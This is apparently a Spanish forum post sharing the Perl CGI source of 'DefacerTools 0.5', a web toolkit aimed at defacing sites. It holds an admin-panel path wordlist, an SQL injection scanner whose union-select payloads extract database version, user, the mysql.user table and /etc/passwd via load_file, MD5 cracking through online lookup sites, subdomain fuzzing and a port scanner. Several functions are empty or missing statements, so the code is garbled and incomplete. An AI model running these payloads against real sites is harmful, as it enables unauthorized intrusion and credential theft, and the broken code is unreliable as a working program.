soporten el mismo , yo hice todas las pruebas con xampp y al parecer todo funciona bien.
Las funciones del programa son :
- HexConverter
- PanelFinder
- PathsFinder
- SQLi Scanner
- FuzzDNS
- FinderPass
- PortScanner
El codigo del programa (formateado con perltidy) es
defacertools.cgi
Código
#!"\xampp\perl\bin\perl.exe" # #DefacerTools 0.5 # #(C) Doddy Hackman 2012 # # use CGI; use LWP::UserAgent; use HTML::LinkExtor; use IO::Socket; @panels = ( 'admin/admin.asp', 'admin/login.asp', 'admin/index.asp', 'admin/admin.aspx', 'admin/login.aspx', 'admin/index.aspx', 'admin/webmaster.asp', 'admin/webmaster.aspx', 'asp/admin/index.asp', 'asp/admin/index.aspx', 'asp/admin/admin.asp', 'asp/admin/admin.aspx', 'asp/admin/webmaster.asp', 'asp/admin/webmaster.aspx', 'admin/', 'login.asp', 'login.aspx', 'admin.asp', 'admin.aspx', 'webmaster.aspx', 'webmaster.asp', 'login/index.asp', 'login/index.aspx', 'login/login.asp', 'login/login.aspx', 'login/admin.asp', 'login/admin.aspx', 'administracion/index.asp', 'administracion/index.aspx', 'administracion/login.asp', 'administracion/login.aspx', 'administracion/webmaster.asp', 'administracion/webmaster.aspx', 'administracion/admin.asp', 'administracion/admin.aspx', 'php/admin/', 'admin/admin.php', 'admin/index.php', 'admin/login.php', 'admin/system.php', 'admin/ingresar.php', 'admin/administrador.php', 'admin/default.php', 'administracion/', 'administracion/index.php', 'administracion/login.php', 'administracion/ingresar.php', 'administracion/admin.php', 'administration/', 'administration/index.php', 'administration/login.php', 'administrator/index.php', 'administrator/login.php', 'administrator/system.php', 'system/', 'system/login.php', 'admin.php', 'login.php', 'administrador.php', 'administration.php', 'administrator.php', 'admin1.html', 'admin1.php', 'admin2.php', 'admin2.html', 'yonetim.php', 'yonetim.html', 'yonetici.php', 'yonetici.html', 'adm/', 'admin/account.php', 'admin/account.html', 'admin/index.html', 'admin/login.html', 'admin/home.php', 'admin/controlpanel.html', 'admin/controlpanel.php', 'admin.html', 'admin/cp.php', 'admin/cp.html', 'cp.php', 'cp.html', 'administrator/', 'administrator/index.html', 'administrator/login.html', 'administrator/account.html', 'administrator/account.php', 'administrator.html', 'login.html', 'modelsearch/login.php', 'moderator.php', 'moderator.html', 'moderator/login.php', 'moderator/login.html', 'moderator/admin.php', 'moderator/admin.html', 'moderator/', 'account.php', 'account.html', 'controlpanel/', 'controlpanel.php', 'controlpanel.html', 'admincontrol.php', 'admincontrol.html', 'adminpanel.php', 'adminpanel.html', 'admin1.asp', 'admin2.asp', 'yonetim.asp', 'yonetici.asp', 'admin/account.asp', 'admin/home.asp', 'admin/controlpanel.asp', 'admin/cp.asp', 'cp.asp', 'administrator/index.asp', 'administrator/login.asp', 'administrator/account.asp', 'administrator.asp', 'modelsearch/login.asp', 'moderator.asp', 'moderator/login.asp', 'moderator/admin.asp', 'account.asp', 'controlpanel.asp', 'admincontrol.asp', 'adminpanel.asp', 'fileadmin/', 'fileadmin.php', 'fileadmin.asp', 'fileadmin.html', 'administration.html', 'sysadmin.php', 'sysadmin.html', 'phpmyadmin/', 'myadmin/', 'sysadmin.asp', 'sysadmin/', 'ur-admin.asp', 'ur-admin.php', 'ur-admin.html', 'ur-admin/', 'Server.php', 'Server.html', 'Server.asp', 'Server/', 'wp-admin/', 'administr8.php', 'administr8.html', 'administr8/', 'administr8.asp', 'webadmin/', 'webadmin.php', 'webadmin.asp', 'webadmin.html', 'administratie/', 'admins/', 'admins.php', 'admins.asp', 'admins.html', 'administrivia/', 'Database_Administration/', 'WebAdmin/', 'useradmin/', 'sysadmins/', 'admin1/', 'system-administration/', 'administrators/', 'pgadmin/', 'directadmin/', 'staradmin/', 'ServerAdministrator/', 'SysAdmin/', 'administer/', 'LiveUser_Admin/', 'sys-admin/', 'typo3/', 'panel/', 'cpanel/', 'cPanel/', 'cpanel_file/', 'platz_login/', 'rcLogin/', 'blogindex/', 'formslogin/', 'autologin/', 'support_login/', 'meta_login/', 'manuallogin/', 'simpleLogin/', 'loginflat/', 'utility_login/', 'showlogin/', 'memlogin/', 'members/', 'login-redirect/', 'sub-login/', 'wp-login/', 'login1/', 'dir-login/', 'login_db/', 'xlogin/', 'smblogin/', 'customer_login/', 'UserLogin/', 'login-us/', 'acct_login/', 'admin_area/', 'bigadmin/', 'project-admins/', 'phppgadmin/', 'pureadmin/', 'sql-admin/', 'radmind/', 'openvpnadmin/', 'wizmysqladmin/', 'vadmind/', 'ezsqliteadmin/', 'hpwebjetadmin/', 'newsadmin/', 'adminpro/', 'Lotus_Domino_Admin/', 'bbadmin/', 'vmailadmin/', 'Indy_admin/', 'ccp14admin/', 'irc-macadmin/', 'banneradmin/', 'sshadmin/', 'phpldapadmin/', 'macadmin/', 'administratoraccounts/', 'admin4_account/', 'admin4_colon/', 'radmind-1/', 'Super-Admin/', 'AdminTools/', 'cmsadmin/', 'SysAdmin2/', 'globes_admin/', 'cadmins/', 'phpSQLiteAdmin/', 'navSiteAdmin/', 'server_admin_small/', 'logo_sysadmin/', 'server/', 'database_administration/', 'power_user/', 'system_administration/', 'ss_vms_admin_sm/' ); my @dns = ('www'); #my @dns = ('www','www1','www2','www3','ftp','ns','mail','3com','aix','apache','back','bind','boreder','bsd','business','chains','cisco','content','corporate','cpv','dns','domino','dominoserver','download','e-mail','e-safe','email','esafe','external','extranet','firebox','firewall','front','fw','fw0','fwe','fw-1','firew','gate','gatekeeper','gateway','gauntlet','group','help','hop','hp','hpjet','hpux','http','https','hub','ibm','ids','info','inside','internal','internet','intranet','ipfw','irix','jet','list','lotus','lotusdomino','lotusnotes','lotusserver','mailfeed','mailgate','mailgateway','mailgroup','mailhost','maillist','mailpop','mailrelay','mimesweeper','ms','msproxy','mx','nameserver','news','newsdesk','newsfeed','newsgroup','newsroom','newsserver','nntp','notes','noteserver','notesserver','nt','outside','pix','pop','pop3','pophost','popmail','popserver','print','printer','private','proxy','proxyserver','public','qpop','raptor','read','redcreek','redhat','route','router','scanner','screen','screening','s#ecure','seek','smail','smap','smtp','smtpgateway','smtpgw','solaris','sonic','spool','squid','sun','sunos','suse','switch','transfer','trend','trendmicro','vlan','vpn','wall','web','webmail','webserver','webswitch','win2000','win2k','upload','file','fileserver','storage','backup','share','core','gw','wingate','main','noc','home','radius','security','access','dmz','domain','sql','mysql','mssql','postgres','db','database','imail','imap','exchange','sendmail','louts','test','logs','stage','staging','dev','devel','ppp','chat','irc','eng','admin','unix','linux','windows','apple','hp-ux','bigip','pc'); my $nave = LWP::UserAgent->new; $nave->agent( "Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201Firefox/2.0.0.12" ); $nave->timeout(5); my %rta; my $que = new CGI; my @ques = $que->param; for (@ques) { $rta{$_} = $que->param($_); } print " <style type=text/css> .main { margin : -287px 0px 0px -490px; border : White solid 1px; BORDER-COLOR: #00FF00; } #pie { position: absolute; bottom: 0; } body,a:link { font: normal 16px Verdana, Arial, Helvetica, sans-serif; background-color: #000000; color:#00FF00; Courier New; cursor:crosshair; font-size: small; } input,table.outset,table.bord,table,textarea,select { background-color:black;color:#00FF00; border: solid 1px #00FF00; border-color:#00FF00 } a:link,a:visited,a:active { color: #00FF00; font: normal 16px Verdana, Arial, Helvetica, sans-serif; text-decoration: none; } </style>"; if ( $rta{'hex'} ) { logouno(); qq(<form method=post action=''><b>Text to encode : </b><input type=text name=textocode value=test><input type=submit name=codificar value=Encode></form>); copyright(); } elsif ( $rta{'textocode'} ) { logouno(); copyright(); } elsif ( $rta{'panelfinder'} ) { logodos(); qq(<form method=post action=''><b>Page : </b><input type=text name=buscarpanel value=http://localhost/><input type=submit value=Find></form>); copyright(); } elsif ( $rta{'buscarpanel'} ) { my $page = $rta{'buscarpanel'}; logodos(); for $path (@panels) { $code = tomax( $page . "/" . $path ); if ( $code->is_success ) { } } copyright(); } elsif ( $rta{'pathsfinder'} ) { logotres(); qq(<form method=post action=''><b>Page : </b><input type=text name=buscarpaths value=http://localhost/doddy><input type=submit name=codificar value=Find></form>); copyright(); } elsif ( $rta{'buscarpaths'} ) { logotres(); my $page = $rta{'buscarpaths'}; my $code = toma($page); my @links = get_links($code); for my $com (@links) { my ( $scheme, $auth, $path, $query, $frag ) = uri_split($page); if ( $path =~ /\/(.*)$/ ) { my $path1 = $1; $page =~ s/$path1//ig; my ( $scheme, $auth, $path, $query, $frag ) = uri_split($com); if ( $path =~ /(.*)\// ) { my $parche = $1; unless ( $repetidos =~ /$parche/ ) { $repetidos .= " " . $parche; my $code = toma( "http://" . $auth . $parche ); if ( $code =~ /Index of (.*)</ig ) { my $dir_found = $1; } } } } } copyright(); } elsif ( $rta{'sqliscanner'} ) { logocuatro(); qq(<form method=post action=''><b>Page : </b><input type=text name=buscarsql value=http://localhost/sql.php?id=><input type=submit name=codificar value=Scan></form>); copyright(); } elsif ( $rta{'buscarsql'} ) { logocuatro(); &length( $rta{'buscarsql'} ); copyright(); } elsif ( $rta{'fuzzdns'} ) { logocinco(); qq(<form method=post action=''><b>Host : </b><input type=text name=buscardns value=google.com><input type=submit name=codificar value=Scan></form>); copyright(); } elsif ( $rta{'buscardns'} ) { logocinco(); my $page = $rta{'buscardns'}; for my $path (@dns) { $code = tomax( "http://" . $path . "." . $page ); if ( $code->is_success ) { } } copyright(); } elsif ( $rta{'finderpass'} ) { logoseis(); qq(<form method=post action=''><b>MD5 : </b><input type=text name=buscarhash value=202cb962ac59075b964b07152d234b70><input type=submit name=codificar value=Scan></form>); copyright(); } elsif ( $rta{'buscarhash'} ) { logoseis(); &crackit( $rta{'buscarhash'} ); copyright(); } elsif ( $rta{'portscanner'} ) { logosiete(); qq(<form method=post action=''><b>IP : </b><input type=text name=buscarpuertos value=localhost><input type=submit name=codificar value=Scan></form>); copyright(); } elsif ( $rta{'buscarpuertos'} ) { logosiete(); scanuno( $rta{'buscarpuertos'} ); copyright(); } elsif ( $rta{'home'} ) { sintax(); } else { sintax(); } sub sintax { <title>DefacerTools 0.5 (C) Doddy Hackman 2012</title> <br><br> <h1><center>DefacerTools</center></h1> <br><br> <center> <table border=1> <td class=main><center><b>Tools</b></center></td><tr> <td class=main><a href=?panelfinder=true><center>PanelFinder</center></a></td><tr> <td class=main><a href=?pathsfinder=true><center>PathsFinder</center></a></td><tr> <td class=main><a href=?sqliscanner=true><center>SQLi Scanner</center></a></td><tr> <td class=main><a href=?fuzzdns=true><center>FuzzDNS</center></a></td><tr> <td class=main><a href=?finderpass=true><center>FinderPass</center></a></td><tr> <td class=main><a href=?portscanner=true><center>PortScanner</center></a></td> </table> </center> ); } sub logouno { <center> <pre> @ @ @@@@ @ @ @ @ @ @ @ @ @ @ @ @@@ @ @ @ @@@ @ @@ @ @ @@@ @@ @@ @@@ @@ @@@@@@ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @@@@@ @@ @ @ @ @ @ @ @ @@@@@ @ @ @@@@@ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@ @ @ @@@@ @@@ @ @ @ @@@ @ @ @@@ @ </pre> ); } sub logodos { <center> <pre> @@@@@ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@ @ @@ @@@ @ @ @ @ @@ @@@@ @@@ @@ @@@@@ @ @@ @ @ @ @ @@@@ @ @@ @ @ @ @ @ @ @ @@@@ @ @ @@@@@ @ @ @ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@@ @ @ @@@ @ @ @ @ @ @@@@ @@@ @ </pre> ); } sub logotres { <center> <pre> @@@@@ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@ @@ @ @@ @@ @ @ @ @@ @@@@ @@@ @@ @@@@@ @ @ @@ @ @ @ @@@@ @ @@ @ @ @ @ @ @ @ @@@@ @ @ @ @ @ @ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@@ @ @ @ @@ @ @ @ @ @@@@ @@@ @ </pre> ); } sub logocuatro { <center> <pre> @@@ @@@@ @ @ @@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@ @@@ @ @@ @ @@ @@@ @@ @@@ @ @ @ @ @@@ @ @ @ @@ @ @@ @ @ @ @ @ @ @ @ @ @ @ @@@@ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@ @@@@ @@@@@ @ @@@ @@@ @@@@ @ @ @ @ @@@ @ @ </pre> ); } sub logocinco { <center> <pre> @@@@@ @@@@ @ @ @@@ @ @ @ @@ @ @ @ @ @ @ @@ @ @ @ @ @ @@@@ @@@@ @ @ @ @ @ @ @@@@ @ @ @ @ @ @ @ @ @ @@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@ @ @ @ @@ @ @ @ @ @ @@ @ @ @ @@ @ @@@@ @@@@ @@@@ @ @ @@@ </pre> ); } sub logoseis { <center> <pre> @@@@@ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @@ @@@@ @@@ @@ @ @ @@@ @@ @@ @@@@ @ @@ @ @ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @@@@@ @ @ @@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@@ @@@ @ @ @@@@ @@ @@ </pre> ); } sub logosiete { <center> <pre> @@@@@ @@@ @ @ @ @ @ @ @ @ @ @ @ @@@ @@ @@ @ @@@ @@@ @ @@ @ @@ @@@ @@ @@@@@ @ @ @ @ @@@ @ @ @ @@ @ @@ @ @ @ @ @ @ @ @ @ @ @ @@@@ @ @ @ @ @@@@@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @@@ @ @ @@@ @@@ @@@@ @ @ @ @ @@@ @ </pre> ); } sub copyright { qq(<br><br><br><br><br><br><br><center><a href=?home=true><b>Return to home</b></a></center><br><br>); } my $rows = "0"; my $asc; my $page = $_[0]; ( $pass1, $pass2 ) = &bypass( $_[1] ); $alert = "char(" . ascii("RATSXPDOWN1RATSXPDOWN") . ")"; $total = "1"; for my $rows ( 2 .. 200 ) { $asc .= "," . "char(" . ascii( "RATSXPDOWN" . $rows . "RATSXPDOWN" ) . ")"; $total .= "," . $rows; $injection = $page . "1" . $pass1 . "and" . $pass1 . "1=0" . $pass1 . "union" . $pass1 . "select" . $pass1 . $alert . $asc; $test = toma($injection); if ( $test =~ /RATSXPDOWN/ ) { $control = 1; my ( $scheme, $auth, $path, $query, $frag ) = uri_split( $_[0] ); my $save = $auth; $total =~ s/$number[0]/hackman/; print "[SQLI] : " . $page . "1" . $pass1 . "and" . $pass1 . "1=0" . $pass1 . "union" . $pass1 . "select" . $pass1 . $total . "<br>"; details( $page . "1" . $pass1 . "and" . $pass1 . "1=0" . $pass1 . "union" . $pass1 . "select" . $pass1 . $total, "--", "" ); } } } sub details { my ( $page, $bypass, $save ) = @_; ( $pass1, $pass2 ) = &bypass($bypass); if ( $page =~ /(.*)hackman(.*)/ig ) { my ( $start, $end ) = ( $1, $2 ); $inforschema = $start . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))" . $end . $pass1 . "from" . $pass1 . "information_schema.tables" . $pass2; $mysqluser = $start . "unhex(hex(concat(char(69,82,84,79,82,56,53,52))))" . $end . $pass1 . "from" . $pass1 . "mysql.user" . $pass2; $test3 = toma( $start . "unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file(0x2f6574632f706173737764))))" . $end . $pass2 ); $test1 = toma($inforschema); $test2 = toma($mysqluser); if ( $test2 =~ /ERTOR854/ig ) { } else { } if ( $test1 =~ /ERTOR854/ig ) { } else { } if ( $test3 =~ /ERTOR854/ig ) { } $concat = "unhex(hex(concat(char(69,82,84,79,82,56,53,52),version(),char(69,82,84,79,82,56,53,52),database(),char(69,82,84,79,82,56,53,52),user(),char(69,82,84,79,82,56,53,52))))"; $injection = $start . $concat . $end . $pass2; $code = toma($injection); if ( $code =~ /ERTOR854(.*)ERTOR854(.*)ERTOR854(.*)ERTOR854/g ) { "<br>[!] DB Version : $1<br>[!] DB Name : $2<br>[!] user_name : $3<br><br>"; } else { } } } sub encode { my $string = $_[0]; $hex = '0x'; } } sub bypass { } sub ascii { } sub toma { } sub tomax { } sub get_links { $test = HTML::LinkExtor->new( \&agarrar )->parse( $_[0] ); sub agarrar { my ( $a, %b ) = @_; } } sub crackit { my $secret = $_[0]; my %hash = ( 'http://passcracking.com/' => { 'tipo' => 'post', 'variables' => '{"datafromuser" => $_[0], "submit" => "DoIT"}', 'regex' => '<\/td><td>md5 Database<\/td><td>$_[0]<\/td><td bgcolor=#FF0000>(.*)<\/td><td>', }, 'http://md5.hashcracking.com/search.php?md5=' => { 'tipo' => 'get', 'regex' => 'Cleartext of $_[0] is (.*)', }, 'http://www.bigtrapeze.com/md5/' => { 'tipo' => 'post', 'variables' => '{"query" => $_[0], "submit" => " Crack "}', 'regex' => 'The hash <strong>$_[0]<\/strong> has been deciphered to: <strong>(.+)<\/strong>', }, 'http://opencrack.hashkiller.com/' => { 'tipo' => 'post', 'variables' => '{"oc_check_md5" => $_[0], "submit" => "Search MD5"}', }, 'http://www.hashchecker.com/index.php?_sls=search_hash' => { 'tipo' => 'post', 'variables' => '{"search_field" => $_[0], "Submit" => "search"}', 'regex' => '<td><li>Your md5 hash is :<br><li>$_[0] is <b>(.*)<\/b> used charl', }, 'http://victorov.su/md5/?md5e=&md5d=' => { 'tipo' => 'get', } ); for my $data ( keys %hash ) { if ( $hash{$data}{tipo} eq "get" ) { $code = toma( $data . $_[0] ); if ( $code =~ /$hash{$data}{regex}/ig ) { print "<br>[+] Decoded : " . $1 . "<br><br>"; print $secret. ":" . $1 . "<br>"; } } else { $code = tomar( $data, $hash{$data}{variables} ); if ( $code =~ /$hash{$data}{regex}/ig ) { print $secret. ":" . $1 . "<br>"; } } } print "<br>[+] Finish<br>"; } sub tomar { my ( $web, $var ) = @_; return $nave->post( $web, [ %{$var} ] )->content; } sub scanuno { my %ports = ( "21" => "ftp", "22" => "ssh", "25" => "smtp", "80" => "http", "110" => "pop3", "3306" => "mysql" ); print "<br>[+] Scanning $_[0]<br><br><br>"; for my $port ( keys %ports ) { if ( new IO::Socket::INET( PeerAddr => $_[0], PeerPort => $port, Proto => "tcp", Timeout => 0.5 ) ) { print "[Port] : " . $port . " [Service] : " . $ports{$port} . "<br>"; } } print "<br><br>[+] Scan Finish<br>"; } # The End ?